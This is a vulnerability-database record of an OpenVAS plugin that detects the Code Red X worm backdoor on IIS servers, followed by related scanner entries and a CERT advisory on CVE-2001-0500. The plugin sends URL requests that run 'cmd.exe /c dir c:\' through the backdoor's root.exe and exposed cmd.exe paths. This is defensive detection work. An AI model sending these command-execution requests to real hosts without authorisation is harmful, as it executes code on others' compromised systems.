ID OPENVAS:136141256231010713 Type openvas Reporter Copyright (C) 2001 SecuriTeam Modified 2020-05-04T00:00:00
Description
Your machine is infected with the 'Code Red' worm. Your Windows system seems to be compromised.
# OpenVAS Vulnerability Test
# Description: CodeRed version X detection
#
# Authors:
# Noam Rathaus <noamr@securiteam.com>
#
# Copyright:
# Copyright (C) 2001 SecuriTeam
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Plugin registration: everything in this block is metadata read by the
# scanner; the probe itself starts after the description block.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.10713");
script_version("2020-05-04T11:06:55+0000");
script_tag(name:"last_modification", value:"2020-05-04 11:06:55 +0000 (Mon, 04 May 2020)");
script_tag(name:"creation_date", value:"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)");
script_bugtraq_id(2880);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
# CVE-2001-0500 is the idq.dll (.ida/.idq) overflow the worm spreads through.
# This plugin does not test that overflow; it looks for the backdoor left
# behind afterwards (root.exe copies and the "C"/"D" virtual directories named
# in the solution text). A hit here therefore means "already compromised",
# not merely "vulnerable".
script_cve_id("CVE-2001-0500");
script_name("CodeRed version X detection");
# NOTE(review): the check below sends `cmd.exe /c dir c:\` through the
# backdoor when it is present, i.e. it runs a command on the target rather
# than only observing a banner. Whether ACT_GATHER_INFO or ACT_ATTACK is the
# appropriate category for that is a scanner-policy question -- confirm before
# relying on "safe checks" scheduling to keep this plugin passive.
script_category(ACT_GATHER_INFO);
script_tag(name:"qod_type", value:"remote_active");
script_copyright("Copyright (C) 2001 SecuriTeam");
script_family("Malware");
# Needs the IIS banner and the embedded-device marker from these two plugins;
# the runtime code re-checks both before sending anything.
script_dependencies("gb_get_http_banner.nasl", "embedded_web_server_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("IIS/banner");
# Steps 1-5 remove the visible artifacts only. The last sentence is the
# advice that matters: a host that has had a SYSTEM-level backdoor reachable
# from the network cannot be trusted after cleanup and should be rebuilt.
script_tag(name:"solution", value:"1) Remove the file root.exe from both directories:
\inetpub\scripts
and
\program files\common files\system\msadc
2) Install an updated antivirus program (this will remove the Explorer.exe Trojan)
3) Set SFCDisable in hklm\software\microsoft\windows nt\currentversion\winlogon to: 0
4) Remove the two newly created virtual directories: C and D (Created by the Trojan)
5) Make sure no other files have been modified.
It is recommended that hosts that have been compromised by Code Red X would reinstall the operating system from scratch and patch it accordingly.");
script_xref(name:"URL", value:"http://www.securiteam.com/securitynews/5GP0V004UQ.html");
script_xref(name:"URL", value:"http://www.securiteam.com/windowsntfocus/5WP0L004US.html");
script_xref(name:"URL", value:"http://www.cert.org/advisories/CA-2001-11.html");
script_xref(name:"URL", value:"http://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp");
script_tag(name:"summary", value:"Your machine is infected with the 'Code Red' worm. Your Windows system seems to be compromised.");
script_tag(name:"solution_type", value:"Mitigation");
exit(0);
}
include("http_func.inc");
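port = http_get_port(default:80);
if( http_get_is_marked_embedded( port:port ) )
 exit( 0 );

# Only IIS hosts can carry this backdoor; bail out on anything else so we
# never send the command-execution probe to an unrelated web server.
sig = http_get_remote_headers(port:port);
if( !sig || "IIS" >!< sig )
 exit(0);

# Send one GET for `item` on `port` and classify the reply.
#
# Returns TRUE when the reply looks like the backdoor answered, FALSE when it
# did not, and NULL when no socket could be opened (the caller stops the whole
# check in that case, as the original code did, rather than retrying on a
# port that is not answering). Each probe uses its own connection.
#
# Match strings: "<DIR>" and "Directory of C" come from cmd.exe's `dir`
# output when the request was actually executed; the DOS-stub string means
# the server served the root.exe image back as a static file, which still
# proves the dropped binary is present.
# NOTE(review): the two dir-output strings are what an English cmd.exe
# prints; a localized Windows build may label the listing differently and be
# missed by those two patterns -- confirm before relying on this for
# non-English hosts.
function probe_backdoor( port, item )
{
 local_var soc, req, buf, pat;

 soc = http_open_socket( port );
 if( ! soc )
  return NULL;

 req = http_get( item:item, port:port );
 send( socket:soc, data:req );
 buf = http_recv( socket:soc );
 http_close_socket( soc );

 if( ! buf )
  return FALSE;

 foreach pat( make_list( "This program cannot be run in DOS mode", "<DIR>", "Directory of C" ) ) {
  if( pat >< buf )
   return TRUE;
 }
 return FALSE;
}

# Two artifacts the worm leaves on an IIS host: a copy of cmd.exe named
# root.exe under /scripts, and a virtual directory "C" mapped to the C: drive
# that exposes the real cmd.exe. Either one answering `dir c:\` (or being
# served back) is reported as a compromise. The command is read-only
# enumeration, but it IS code execution on the target through the backdoor,
# so the probes are sent in order and stop at the first hit.
foreach item( make_list( "/scripts/root.exe?/c+dir+c:\+/OG",
                         "/c/winnt/system32/cmd.exe?/c+dir+c:\+/OG" ) ) {
 res = probe_backdoor( port:port, item:item );
 if( isnull( res ) )
  exit( 0 );
 if( res ) {
  security_message( port:port );
  exit( 0 );
 }
}

exit( 0 );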
{"id": "OPENVAS:136141256231010713", "type": "openvas", "bulletinFamily": "scanner", "title": "CodeRed version X detection", "description": "Your machine is infected with the ", "published": "2005-11-03T00:00:00", "modified": "2020-05-04T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010713", "reporter": "Copyright (C) 2001 SecuriTeam", "references": ["http://www.securiteam.com/securitynews/5GP0V004UQ.html", "http://www.cert.org/advisories/CA-2001-11.html", "http://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp", "http://www.securiteam.com/windowsntfocus/5WP0L004US.html"], "cvelist": ["CVE-2001-0500"], "lastseen": "2020-05-08T08:39:58", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2001-0500"]}, {"type": "exploitdb", "idList": ["EDB-ID:20930", "EDB-ID:20932", "EDB-ID:16472", "EDB-ID:20933", "EDB-ID:20931"]}, {"type": "openvas", "idList": ["OPENVAS:10695", "OPENVAS:10713", "OPENVAS:136141256231010695"]}, {"type": "cert", "idList": ["VU:952336"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:1738", "SECURITYVULNS:DOC:1737"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82956"]}, {"type": "canvas", "idList": ["MS01_033"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IIS/MS01_033_IDQ"]}, {"type": "osvdb", "idList": ["OSVDB:568"]}, {"type": "nessus", "idList": ["IIS_ISAPI_OVERFLOW.NASL"]}], "modified": "2020-05-08T08:39:58", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-05-08T08:39:58", "rev": 2}, "vulnersScore": 7.4}, "pluginID": "136141256231010713", "sourceData": "# OpenVAS Vulnerability Test\n# Description: CodeRed version X detection\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public 
License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10713\");\n script_version(\"2020-05-04T11:06:55+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-04 11:06:55 +0000 (Mon, 04 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0500\");\n script_name(\"CodeRed version X detection\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_active\");\n script_copyright(\"Copyright (C) 2001 SecuriTeam\");\n script_family(\"Malware\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"embedded_web_server_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/banner\");\n\n script_tag(name:\"solution\", value:\"1) Remove the file root.exe from both directories:\n\n \\inetpub\\scripts\n\n and\n\n \\program files\\common files\\system\\msadc\n\n 2) Install an updated antivirus program (this will remove the Explorer.exe Trojan)\n\n 3) Set SFCDisable in hklm\\software\\microsoft\\windows nt\\currentversion\\winlogon to: 0\n\n 4) Remove the two newly created virtual directories: C and D (Created by the Trojan)\n\n 5) Make sure no other files have been modified.\n\n It is recommended that hosts that have been compromised by Code 
Red X would reinstall the operating system from scratch and patch it accordingly.\");\n\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/securitynews/5GP0V004UQ.html\");\n script_xref(name:\"URL\", value:\"http://www.securiteam.com/windowsntfocus/5WP0L004US.html\");\n script_xref(name:\"URL\", value:\"http://www.cert.org/advisories/CA-2001-11.html\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp\");\n\n script_tag(name:\"summary\", value:\"Your machine is infected with the 'Code Red' worm. Your Windows system seems to be compromised.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nif( http_get_is_marked_embedded( port:port ) )\n exit( 0 );\n\nsig = http_get_remote_headers(port:port);\nif( !sig || \"IIS\" >!< sig )\n exit(0);\n\nsoc = http_open_socket(port);\nif(!soc)\n exit(0);\n\nreq = http_get(item:\"/scripts/root.exe?/c+dir+c:\\+/OG\", port:port);\nsend(socket:soc, data:req);\nbuf = http_recv(socket:soc);\nhttp_close_socket(soc);\n\npat1 = \"<DIR>\";\npat2 = \"Directory of C\";\n\nif ( (\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n{\n security_message(port);\n exit(0);\n} else {\n\n soc = http_open_socket(port);\n if ( ! soc )\n exit(0);\n\n req = http_get(item:\"/c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG\", port:port);\n send(socket:soc, data:req);\n\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n if ((\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n {\n security_message(port);\n exit(0);\n }\n}\n", "naslFamily": "Malware"}
{"cve": [{"lastseen": "2020-12-09T19:19:24", "description": "Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Service 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrary commands via a long argument to Internet Data Administration (.ida) and Internet Data Query (.idq) files such as default.ida, as commonly exploited by Code Red.", "edition": 5, "cvss3": {}, "published": "2001-07-21T04:00:00", "title": "CVE-2001-0500", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2001-0500"], "modified": "2018-10-12T21:30:00", "cpe": ["cpe:/a:microsoft:internet_information_server:6.0", "cpe:/a:microsoft:indexing_service:*", "cpe:/a:microsoft:index_server:2.0"], "id": "CVE-2001-0500", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0500", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_information_server:6.0:beta:*:*:*:*:*:*", "cpe:2.3:a:microsoft:indexing_service:*:*:windows_2000:*:*:*:*:*", "cpe:2.3:a:microsoft:index_server:2.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-08T11:44:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500"], "description": "Your machine is infected with the 'Code Red' worm. 
Your Windows system seems to be compromised.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10713", "href": "http://plugins.openvas.org/nasl.php?oid=10713", "type": "openvas", "title": "CodeRed version X detection", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: codered_x.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: CodeRed version X detection\n#\n# Authors:\n# Noam Rathaus <noamr@securiteam.com>\n#\n# Copyright:\n# Copyright (C) 2001 SecuriTeam\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_summary = \"Your machine is infected with the 'Code Red' worm. 
Your Windows system seems to be compromised.\";\n\ntag_solution = \"1) Remove the file root.exe from both directories:\n\\inetpub\\scripts\n\nand\n\n\\program files\\common files\\system\\msadc\n\n2) Install an updated antivirus program (this will remove the Explorer.exe Trojan)\n3) Set SFCDisable in hklm\\software\\microsoft\\windows nt\\currentversion\\winlogon to: 0\n4) Remove the two newly created virtual directories: C and D (Created by the Trojan)\n5) Make sure no other files have been modified.\n\nIt is recommended that hosts that have been compromised by Code Red X would reinstall the operating system from scratch and patch it accordingly.\n\nAdditional information:\nhttp://www.securiteam.com/securitynews/5GP0V004UQ.html\nhttp://www.securiteam.com/windowsntfocus/5WP0L004US.html\nhttp://www.cert.org/advisories/CA-2001-11.html\nhttp://www.microsoft.com/technet/itsolutions/security/tools/redfix.asp\";\n\n\nif(description)\n{\n script_id(10713); \n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_bugtraq_id(2880);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2001-0500\");\n\n name = \"CodeRed version X detection\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_copyright(\"This script is Copyright (C) 2001 SecuriTeam\");\n family = \"Malware\";\n script_family(family);\n\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"IIS/banner\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n 
exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\n\nif ( get_kb_item(\"Services/www/\" + port + \"/embedded\") ) exit(0);\n\nsig = get_http_banner(port:port);\nif ( !sig || \"IIS\" >!< sig ) exit(0);\n\nsoc = http_open_socket(port);\nif(soc)\n{\n req = http_get(item:\"/scripts/root.exe?/c+dir+c:\\+/OG\", port:port);\n send(socket:soc, data:req);\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n pat1 = \"<DIR>\";\n pat2 = \"Directory of C\";\n \n if ( (\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n {\n security_message(port);\n exit(0);\n }\n else\n {\n soc = http_open_socket(port);\n if ( ! soc ) exit(0);\n req = http_get(item:\"/c/winnt/system32/cmd.exe?/c+dir+c:\\+/OG\", port:port);\n send(socket:soc, data:req);\n\n buf = http_recv(socket:soc);\n http_close_socket(soc);\n\n if ((\"This program cannot be run in DOS mode\" >< buf) || (pat1 >< buf) || (pat2 >< buf) )\n {\n security_message(port);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-08T11:44:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500"], "description": "Indexing Service filter is enabled on the remote Web server.\n\nDescription :\n\nThe IIS server appears to have the .IDA ISAPI filter mapped.\n\nAt least one remote vulnerability has been discovered for the .IDA\n(indexing service) filter. This is detailed in Microsoft Advisory\nMS01-033, and gives remote SYSTEM level access to the web server. 
\n\nIt is recommended that even if you have patched this vulnerability that\nyou unmap the .IDA extension, and any other unused ISAPI extensions\nif they are not required for the operation of your site.", "modified": "2017-12-07T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:10695", "href": "http://plugins.openvas.org/nasl.php?oid=10695", "type": "openvas", "title": "IIS .IDA ISAPI filter applied", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: iis_ida_isapi.nasl 8023 2017-12-07 08:36:26Z teissa $\n# Description: IIS .IDA ISAPI filter applied\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# Modified by rd to have a language independent pattern matching, thanks\n# to the remarks from Nicolas Gregoire <ngregoire@exaprobe.com>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_solution = \"To unmap the .IDA extension:\n 1.Open Internet Services Manager. \n 2.Right-click the Web server choose Properties from the context menu. \n 3.Master Properties \n 4.Select WWW Service -> Edit -> HomeDirectory -> Configuration \nand remove the reference to .ida from the list.\n\nIn addition, you may wish to download and install URLSCAN from the\nMicrosoft Technet web site. 
URLSCAN, by default, blocks all .ida\nrequests to the IIS server.\";\n\ntag_summary = \"Indexing Service filter is enabled on the remote Web server.\n\nDescription :\n\nThe IIS server appears to have the .IDA ISAPI filter mapped.\n\nAt least one remote vulnerability has been discovered for the .IDA\n(indexing service) filter. This is detailed in Microsoft Advisory\nMS01-033, and gives remote SYSTEM level access to the web server. \n\nIt is recommended that even if you have patched this vulnerability that\nyou unmap the .IDA extension, and any other unused ISAPI extensions\nif they are not required for the operation of your site.\";\n\n\nif(description)\n{\n script_id(10695);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0008\");\n script_bugtraq_id(2880);\n script_cve_id(\"CVE-2001-0500\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n name = \"IIS .IDA ISAPI filter applied\";\n script_name(name);\n \n\n \n \n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n \n script_copyright(\"This script is Copyright (C) 2001 Matt Moore\");\n family = \"Web Servers\";\n script_family(family);\n script_dependencies(\"gb_get_http_banner.nasl\", \"no404.nasl\");\n script_mandatory_keys(\"IIS/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n exit(0);\n}\n\n# Check makes a request for NULL.ida\ninclude(\"http_func.inc\");\n\nport = get_http_port(default:80);\n\nif ( get_kb_item(\"Services/www/\" + port + \"/embedded\") ) exit(0);\nsig = get_http_banner(port:port);\nif ( sig && \"IIS\" >!< sig ) 
exit(0);\nif(get_port_state(port))\n{ \n req = http_get(item:\"/NULL.ida\", port:port);\n soc = http_open_socket(port);\n if(soc)\n {\n send(socket:soc, data:req);\n r = http_recv(socket:soc);\n http_close_socket(soc);\n look = strstr(r, \"<HTML>\");\n look = look - string(\"\\r\\n\");\n if(egrep(pattern:\"^.*HTML.*IDQ.*NULL\\.ida.*$\", string:look)) security_message(port);\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-05-08T08:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0500"], "description": "Indexing Service filter is enabled on the remote Web server.", "modified": "2020-05-04T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231010695", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231010695", "type": "openvas", "title": "IIS .IDA ISAPI filter applied", "sourceData": "# OpenVAS Vulnerability Test\n# Description: IIS .IDA ISAPI filter applied\n#\n# Authors:\n# Matt Moore <matt.moore@westpoint.ltd.uk>\n# www.westpoint.ltd.uk\n# Modified by rd to have a language independent pattern matching, thanks\n# to the remarks from Nicolas Gregoire <ngregoire@exaprobe.com>\n#\n# Copyright:\n# Copyright (C) 2001 Matt Moore\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.10695\");\n script_version(\"2020-05-04T11:06:55+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-04 11:06:55 +0000 (Mon, 04 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_xref(name:\"IAVA\", value:\"2001-a-0008\");\n script_bugtraq_id(2880);\n script_cve_id(\"CVE-2001-0500\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"IIS .IDA ISAPI filter applied\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n script_copyright(\"Copyright (C) 2001 Matt Moore\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_get_http_banner.nasl\", \"embedded_web_server_detect.nasl\");\n script_mandatory_keys(\"IIS/banner\");\n script_require_ports(\"Services/www\", 80);\n\n script_tag(name:\"summary\", value:\"Indexing Service filter is enabled on the remote Web server.\");\n\n script_tag(name:\"insight\", value:\"The IIS server appears to have the .IDA ISAPI filter mapped.\n\n At least one remote vulnerability has been discovered for the .IDA\n (indexing service) filter. 
This is detailed in Microsoft Advisory\n MS01-033, and gives remote SYSTEM level access to the web server.\n\n It is recommended that even if you have patched this vulnerability that\n you unmap the .IDA extension, and any other unused ISAPI extensions\n if they are not required for the operation of your site.\");\n\n script_tag(name:\"solution\", value:\"To unmap the .IDA extension:\n\n 1.Open Internet Services Manager.\n\n 2.Right-click the Web server choose Properties from the context menu.\n\n 3.Master Properties\n\n 4.Select WWW Service -> Edit -> HomeDirectory -> Configuration\n and remove the reference to .ida from the list.\n\n In addition, you may wish to download and install URLSCAN from the\n Microsoft Technet web site. URLSCAN, by default, blocks all .ida\n requests to the IIS server.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:80);\nif( http_get_is_marked_embedded( port:port ) )\n exit( 0 );\n\nsig = http_get_remote_headers(port:port);\nif( sig && \"IIS\" >!< sig )\n exit(0);\n\nreq = http_get(item:\"/NULL.ida\", port:port);\nsoc = http_open_socket(port);\nif(!soc)\n exit(0);\n\nsend(socket:soc, data:req);\nr = http_recv(socket:soc);\nhttp_close_socket(soc);\nlook = strstr(r, \"<HTML>\");\nlook = look - string(\"\\r\\n\");\nif(egrep(pattern:\"^.*HTML.*IDQ.*NULL\\.ida.*$\", string:look))\n security_message(port);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:45:15", "bulletinFamily": "info", "cvelist": ["CVE-2001-0500"], "description": "### Overview \n\nA vulnerability exists in the Indexing services used by Microsoft IIS 4.0 and IIS 5.0 running on Windows NT, Windows 2000, and beta versions of Windows XP. 
Exploitations of this vulnerability allows a remote intruder to run arbitrary code on the victim machine.\n\n### Description \n\nThere is a remotely exploitable buffer overflow in the ISAPI (Indexing Service Application Programming Interface) extension (IDQ.DLL) installed with most versions of IIS 4.0 and 5.0. This affects Windows NT 4.0, Windows 2000 (Server and Professional), Windows 2000 Datacenter OEM distributions, Indexing Server 2.0, and the Indexing Services on all Windows 2000 platforms; however, not all of these instances are vulnerable by default. The beta versions of Windows XP are vulnerable by default. \n \nThe only precondition for exploiting this vulnerability is that an IIS server is running with script mappings for Internet Data Administration (.ida) and Internet Data Query (.idq) files. The Indexing Services do not need to be running. As stated by Microsoft in [MS01-033](<http://www.microsoft.com/technet/security/bulletin/ms01-033.asp>): \n \n`The buffer overrun occurs before any indexing functionality is requested. As a result, even though idq.dll is a component of Index Server/Indexing Service, the service would not need to be running in order for an attacker to exploit the vulnerability. As long as the script mapping for .idq or .ida files were present, and the attacker were able to establish a web session, he could exploit the vulnerability.` \n \nWhen this buffer overflow is exploited, a remote user may be able run arbitrary code on the victim machine with SYSTEM privileges (which the IIS service has by default). 
\n \nMicrosoft has released patches for this vulnerability that can be downloaded from \n \n[http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>) (NT) \n<http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800> (Windows 2000) \n \nFor more information, see [MS01-033](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>) and the [eEye Digital Security bulletin](<http://www.eeye.com/html/Research/Advisories/AD20010618.html>). \n \nMicrosoft has released a patch which supercedes the two listed above. Please see [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>) for more information. \n \n--- \n \n### Impact \n\nRemote intruders can execute arbitrary code with SYSTEM privileges in the Local System security context. \n \n--- \n \n### Solution \n\nApply patches for vulnerable Windows NT 4.0 and Windows 2000 systems: \nWindows NT 4.0: \n[http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 ](<http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833>) \nWindows 2000 Professional, Server and Advanced Server: \n[http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800 ](<http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800>) \n \nUsers of Windows 2000 Datacenter Server software should contact their original equipment manufacturer (OEM) for patches. \n \nMicrosoft has released a patch which supercedes the two listed above. Please see [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>) for more information. \n \n--- \n \n#### Workarounds\n\n \nAll affected versions of IIS/Indexing Services can be protected against exploits of this vulnerbility by removing script mappings for for Internet Data Administration (.ida) and Internet Data Query (.idq) files. However, Microsoft makes no guarantees such mappings will not be recreated when installing other related software components. 
\n \nUsers of beta copies of Windows XP should upgrade to a newer version of the software when it becomes available. \n--- \n \n### Vendor Information\n\n952336\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft __ Affected\n\nNotified: June 18, 2001 Updated: August 16, 2001 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nMicrosoft has released the following advisory regarding this issue: [MS01-033](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>)\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nMicrosoft has released a patch which supercedes the ones listed in [MS01-033](<http://www.microsoft.com/technet/security/bulletin/MS01-033.asp>). Please see [MS01-044](<http://www.microsoft.com/technet/security/bulletin/MS01-044.asp>) for more information.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23952336 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References 